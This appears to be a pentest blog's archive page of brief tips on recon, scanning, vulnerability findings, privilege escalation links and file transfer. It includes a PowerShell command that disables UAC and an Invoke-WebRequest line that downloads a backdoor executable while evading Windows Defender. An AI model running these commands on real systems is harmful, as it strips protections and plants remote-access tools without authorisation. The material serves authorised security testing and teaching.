Search in exploit-db
searchsploit --color samba | grep 'linux\/' | grep -v '/dos/' |
Category Archives: Pentest
Uploading / Downloading Files
After we gained a foothold on our target (exploitation) we want to upload and download files.
OS Fingerprinting
Scanning udp port 1434 SQL Browser
Objective
On UDP port 1434 is most likely the MS SQL Browser Service listening.
You can query this service to retrieve version info and the TCP port where MS SQL Server Service is listening.
Nmap
nmap -P0 -v -sU -sV -p 1434 <ip> --script ms-sql-info |
UDP port Scanning
Privilege Escalation
References
Basic Linux Privilege Escalation
Windows Privilege Escalation
- http://www.fuzzysecurity.com/tutorials/16.html
- http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3BzIszsQ%2FYRU%2BiWuuAK42a9w%3D%3D
- https://github.com/ankh2054/windows-pentest?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3BzIszsQ%2FYRU%2BiWuuAK42a9w%3D%3D
- https://github.com/SecWiki/windows-kernel-exploits
- https://github.com/abatchy17/WindowsExploits
Reverse Shells
Scan Public WebServer SSL/TLS configuration via online tools
No Custom Errors implemented
Often, during a penetration test on web applications, we come up against many error codes generated from applications or web servers. It’s possible to cause these errors to be displayed by using a particular requests, either specially crafted with tools or created manually. These codes are very useful to penetration testers during their activities, because they reveal a lot of information about databases, bugs, and other technological components directly linked with web applications.
ASP.NET DEBUG enabled
Nikto Output
DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
The X-Content-Type-Options header is not set
Nikto Output
The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
Link-Local Multicast Name Resolution (LLMNR) Detection
Nessus Output
Synopsis : The remote device supports LLMNR. Description : The remote device answered to a Link-local Multicast Name Resolution (LLMNR) request. This protocol provides a name lookup service similar to NetBIOS or DNS. It is enabled by default on modern Windows versions.
Reported Risk factor by Nessus: None
In my option the severity should be much higher.
AtomBombing
Description
Code injection technique published by ensilo.
Verify HTTP response headers
Content-Type header missing
You probably gonna find this issue in your manual browsing and spidering phase of your assessment. But also Netsparker will report this issue during your scanning phase.
X-Frame-Options header is not set
You probably gonna find this issue in your manual browsing and spidering phase of your assessment. But also Nessus will report this issue during your scanning phase.
Password autocomplete in browser
You probably gonna find this issue in your manual browsing and spidering phase of your assessment. But also Nessus will report this issue during your scanning phase.
Metasploit Links
MS15-034: Vulnerability in HTTP.sys Could Allow Remote Code Execution (3042553)
Nessus Output
Description
The version of Windows running on the remote host is affected by a vulnerability in the HTTP protocol stack (HTTP.sys) due to improperly parsing crafted HTTP requests. A remote attacker can exploit this to execute arbitrary code with System privileges.
vFeed Usage / Cheat Sheet
What is vFeed
- Cross Linked and Aggregated Local Vulnerability Database
- https://github.com/toolswatch/vFeed
- http://www.vfeed.io/
Pentest Methodologies
There are many Pentest Methodologies that all share the same basic approach but their phases are named differently:
- Pre-engagement steps / Preparation / Scoping
- Intelligence Gathering / Information Gathering / Reconnaissance (Recon) / Open source intelligence (OSINT) / Footprinting
- Threat Modeling
- Scanning / Mapping / Enumeration / Vulnerability Analysis / Discovery
- Exploitation
- Post-Exploitation / Maintaining Access / Covering Tracks
- Reporting
Brute forcing DNS Records
Test Objectives
Perform name lookups with a wordlist (dictionary attack) to identify services/hosts/websites in the target domain. Only applicable if Check for DNS zone transfer failed.
Check for Reverse DNS lookup presence
Test Objective:
Obtain valid server names and aliases for the IP addresses in the defined scope of the test.
Only applicable if Check for DNS zone transfer failed.
Check for DNS zone transfer
Test Objective
Test if the authoritative nameservers are allowing zone transfers for the domains in scope.
BING IP Search
Test Objectives
To understand what sensitive design and configuration information of the application/system/organization is exposed both directly (on the organization’s website) or indirectly (on a third party website).
(from the OWASP Testing Guide v4.0 Conduct search engine discovery/reconnaissance for information leakage (OTG-INFO-001)
Fingerprint Web Server (Active)
Test Objectives
Find the version and type of a running web server to determine known
vulnerabilities and the appropriate exploits to use during testing.
(OWASP Testing Guide v4.0 – OTG-INFO-002)
Fingerprint Web Server (Passive)
Test Objectives
Find the version and type of a running web server to determine known
vulnerabilities and the appropriate exploits to use during testing.
(OWASP Testing Guide v4.0 – Fingerprint Web Server OTG-INFO-002)
Shodan Search
Test Objectives
To understand what sensitive design and configuration information of the application/system/organization is exposed both directly (on the organization’s website) or indirectly (on a third party website).
(from the OWASP Testing Guide v4.0 Conduct search engine discovery/reconnaissance for information leakage (OTG-INFO-001)
Locate the Target Web Presence
Check for DNS software version
Test Objective:
Check if the DNS servers are vulnerable to version queries.
Analyze the reported version for vulnerabilities and available exploits.
Check For Authoritative Name Servers
Find Out Domain Registration Info and IP Block Owned
Objectives:
- Determine iprange of target(s)
- Determine nameservers of target(s)
- Determine ASnumber or target(s)
- Determine registrar of target (provider)
- Determine address information of Registrar
- Identify administrative contacts
- Collect telephone numbers
- Gather Emailaddresses
Disable User Access Control (UAC)
Powershell:
New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force |
Reboot required!
Links:
What pentesters should know about UAC
Sort IP addresses
Bash:
sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 |
Powershell:
gc .\ips.txt | sort {"{0:d3}.{1:d3}.{2:d3}.{3:d3}" -f @([int[]]$_.split(‘.’)) } |
Excel:
Use the following formula to calculate a number which we can sort on (cell A2):
=((VALUE(LEFT(B2, FIND(".", B2)-1)))*256^3)+((VALUE(MID(B2, FIND(".", B2)+1, FIND(".", B2, FIND(".", B2)+1)-FIND(".", B2)-1)))*256^2)+((VALUE(MID(B2, FIND(".", B2, FIND(".", B2)+1)+1, FIND(".", B2, FIND(".", B2, FIND(".", B2)+1)+1)-FIND(".", B2, FIND(".", B2)+1)-1)))*256)+(VALUE(RIGHT(B2, LEN(B2)-FIND(".", B2, FIND(".", B2, FIND(".", B2)+1)+1))))
Downloading files via the commandline (Windows)
Disarm Windows Defender
When we try to download a backdoor program Windows Defender will block the file.
Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe" |
Pingsweeps
A few code snippets to perform ping sweeps: